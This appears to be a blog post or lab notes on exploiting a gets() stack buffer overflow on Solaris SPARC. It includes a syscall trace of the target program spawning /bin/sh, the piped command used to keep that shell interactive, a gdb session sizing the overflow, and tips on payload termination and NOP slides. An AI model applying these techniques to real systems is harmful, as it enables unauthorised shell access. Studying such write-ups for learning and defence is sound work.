stat("/tools/gcc-3.4.2/lib/libc.so.1", 0xFFBEF638) Err#2 ENOENT
stat("/usr/lib/libc.so.1", 0xFFBEF638) = 0
resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18
open("/usr/lib/libc.so.1", O_RDONLY) = 3
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000
mmap(0x10B0A4E0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000
mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000
mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000
munmap(0xFF32C000, 65536) = 0
memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3) = 0
stat("/usr/lib/libdl.so.1", 0xFFBEF638) = 0
resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19
open("/usr/lib/libdl.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x1018CDC8, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF380000
mmap(0xFF380000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF380000
close(3) = 0
stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF350) = 0
resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37
open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000
mmap(0xFF370000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000
close(3) = 0
mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF360000
munmap(0xFF390000, 8192) = 0
brk(0x000310C8) = 0
brk(0x000330C8) = 0
getuid() = 100 [100]
getuid() = 100 [100]
execve("/home/bazz/latest/v", 0xFFBEFD64, 0x000314E0) argc = 1
resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16
open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT
stat("/usr/lib/libc.so.1", 0xFFBEF7F0) = 0
resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18
open("/usr/lib/libc.so.1", O_RDONLY) = 3
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000
mmap(0x127A87A0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000
mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000
mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000
munmap(0xFF32C000, 65536) = 0
memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3) = 0
stat("/usr/lib/libdl.so.1", 0xFFBEF7F0) = 0
resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19
open("/usr/lib/libdl.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x127A4538, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF380000
mmap(0xFF380000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF380000
close(3) = 0
stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF508) = 0
resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37
open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000
mmap(0xFF370000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000
close(3) = 0
mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF360000
munmap(0xFF390000, 8192) = 0
sp = 0xwrite(2, " s p = 0 x", 7) = 7
ffbefdb8write(2, " f f b e f d b 8", 8) = 8
write(2, "\n", 1) = 1
ioctl(0, TCGETA, 0xFFBEFB54) Err#25 ENOTTY
fstat64(0, 0xFFBEFBC8) = 0
brk(0x00020B00) = 0
brk(0x00024B00) = 0
read(0, "01 A A A01 B B B01 C C C".., 8192) = 421
read(0, 0x00020B0C, 8192) = 0
execve("/bin/sh", 0xFFBEFEB0, 0x00000000) argc = 2
resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16
open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT
stat("/usr/lib/libgen.so.1", 0xFFBEF828) = 0
resolvepath("/usr/lib/libgen.so.1", "/usr/lib/libgen.so.1", 1023) = 20
open("/usr/lib/libgen.so.1", O_RDONLY) = 3
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000
mmap(0x0393CD50, 98304, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000
mmap(0xFF370000, 23073, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000
mmap(0xFF386000, 2335, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 24576) = 0xFF386000
munmap(0xFF376000, 65536) = 0
memcntl(0xFF370000, 6932, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3) = 0
stat("/usr/lib/libc.so.1", 0xFFBEF828) = 0
resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18
open("/usr/lib/libc.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x13ABB888, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000
mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000
mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000
munmap(0xFF32C000, 65536) = 0
memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3) = 0
stat("/usr/lib/libdl.so.1", 0xFFBEF828) = 0
resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19
open("/usr/lib/libdl.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x1312EF40, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF360000
mmap(0xFF360000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF360000
close(3) = 0
stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF540) = 0
resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37
open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF350000
mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF270000
mmap(0xFF270000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF270000
close(3) = 0
munmap(0xFF390000, 8192) = 0
getpid() = 2098 [2097]
getpgid(2098) = 2097
getsid(2098) = 1819
brk(0x0003A108) = 0
sysconfig(_CONFIG_SIGRT_MIN) = 38
sysconfig(_CONFIG_SIGRT_MAX) = 45
sigaltstack(0xFFBEFE5C, 0x00000000) = 0
sigaction(SIGHUP, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGHUP, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGINT, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGINT, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGQUIT, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGQUIT, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGILL, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGILL, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGTRAP, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGTRAP, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGABRT, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGABRT, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGEMT, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGEMT, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGFPE, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGFPE, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGBUS, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGBUS, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGSEGV, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGSYS, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGSYS, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGPIPE, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGPIPE, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGALRM, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGALRM, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGTERM, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGTERM, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGUSR1, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGUSR1, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGUSR2, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGUSR2, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGPWR, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGPWR, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGURG, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGURG, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGPOLL, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGPOLL, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGVTALRM, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGVTALRM, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGPROF, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGPROF, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGXCPU, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGXFSZ, 0x00000000, 0xFFBEFDD8) = 0
sigaction(SIGRTMIN, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGRTMIN+1, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGRTMIN+2, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGRTMIN+3, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGRTMAX-3, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGRTMAX-2, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGRTMAX-1, 0xFFBEFD38, 0xFFBEFDB8) = 0
sigaction(SIGRTMAX, 0xFFBEFD38, 0xFFBEFDB8) = 0
getuid() = 100 [100]
getuid() = 100 [100]
getgid() = 10 [10]
getgid() = 10 [10]
getuid() = 100 [100]
ioctl(0, TCGETS, 0x000391B0) Err#25 ENOTTY
$ write(2, " $ ", 2) = 2
read(0, 0x000394D0, 128) = 0
fcntl(0, F_GETFL, 0x00000000) = 8192
fstat64(0, 0xFFBEFC28) = 0
ioctl(0, TCGETA, 0xFFBEFD7C) Err#25 ENOTTY
close(0) = 0
llseek(0, 0, SEEK_CUR) Err#9 EBADF
_exit(0)
-bash-4.3$
I finally start to put 2 and 2 together…
$PWD/invoke2 v < payload
The above snippet was the problem.. Since I was piping from the file.. when the shell gets spawned it’s just like;; “I GUESS IM FINISHED HERE.. EOF”..
Here’s my temporary happiness inspired from http://stackoverflow.com/questions/8509045/execve-bin-sh-0-0-in-a-pipe
Here’s a temporary solution
- without
the beauty of raw tty (you may have to hit enter once at the beginning and again after doing an ‘exit’:
Notes
The difference between invoking /bin/sh -i and simply only /bin/bash is that -i adds automatically the $ prompt. I could not find a way to set the prompt manually when only using /bin/sh thru cat without -i.
Here’s an example of the exploit running, which it does an execve /bin/sh -i
# anything enclosed in [] is note from me added after execution -bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin -bash-4.3$ (cat payload; cat) | $PWD/invoke2 v sp = 0xffbefdb8 [hangs here until you hit enter key, probably an incident of using cat and cooked input] $ ls alternating_payload2 asmshell2.bin exec payload3 v2 alternating_payload2.c asmshell3.bin howto_a_payload payload_asmshell6 v2.c alternating_payload3 asmshell4.bin invoke2 payload_fix_fp write_raw.bin alternating_payload3.c asmshell5_interactive.bin ksh_shellcode payload_trashed_fp asm asmshell6.bin magic_crash_length readme.txt asm_tcsh.bin build_shellcode_steps payload v asmshell.bin core payload2 v.c $ exit [hangs here until you hit enter key again, probably an incident of using cat and cooked input] -bash-4.3$
Figure out how much space there is until overflow into Libc (that’s bad)
(gdb) q -bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin; ./alternating_payload2 1024 >> payload; printf "\x00" >> payload -bash-4.3$ $PWD/invoke2 -d v GNU gdb 6.6 Copyright (C) 2006 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.8"... (gdb) b 16 Breakpoint 1 at 0x10750: file v.c, line 16. (gdb) r < payload Starting program: /home/bazz/latest/v < payload warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1" sp = 0xffbefda0 Program received signal SIGSEGV, Segmentation fault. 0xff2c3064 in memccpy () from /usr/lib/libc.so.1 (gdb)
Only logical explanation is that the buffer needs to be shortened. It must be overwriting libc, or some SUPER out of bounds area… maybe completely went off the charts.. IONNO I try to understand it but it isn’t working so I just cut the buffer down. Actually I just learned. using pmap tools and trialing the buffer size, the fact is that the stack is allocated 8K from FFBEE000 8K read/write/exec [ stack ]
FFBEE000 + 8k (0x2000) = 0xFFBF0000
which is past the page boundary..
(gdb) 0xffbeff80: 0x03424242 0x03434343 0x03444444 0x03454545 0xffbeff90: 0x03464646 0x03474747 0x03484848 0x03494949 0xffbeffa0: 0x034a4a4a 0x034b4b4b 0x034c4c4c 0x034d4d4d 0xffbeffb0: 0x034e4e4e 0x034f4f4f 0x03505050 0x03515151 0xffbeffc0: 0x03525252 0x03535353 0x03545454 0x03555555 0xffbeffd0: 0x03565656 0x03575757 0x03585858 0x03595959 0xffbeffe0: 0x035a5a5a 0x04414141 0x04424242 0x04434343 0xffbefff0: 0x04444444 0x04454545 (gdb) 0xffbefff8: 0x04464646 0x04470000 Cannot access memory at address 0xffbf0000 (gdb)
NOTE!! When exploiting gets(), it is IMPERTINENT to use a 0x0a rather than null byte. is it the leading role in string termination.. I didn’t do that above and it led to hairy things.. I had to hit enter myself causing a \r\n which is why the last 2 bytes are 0000, that was space needed for \r\n I assume.. you can rid this by using 0x0a in your buffer.
in the scheme of exploiting apply, the program can be spawned an unlimited number of times.
To get really sweet, it’s time to open our own TTY to “write” our shellcode through and eventually our own terminal to directly operate with the shell on the other end :)
- Notes On my blade 150
$18 byte difference between debug and production return address offset. This difference does not exist on school production servers.
i.e.
e50 # debug return address – 8
e68 # production return address – 8
To-Do:
Add in a sweet nop-slide
Then find a suitable backoff limit, and fill with nops
Leave a Reply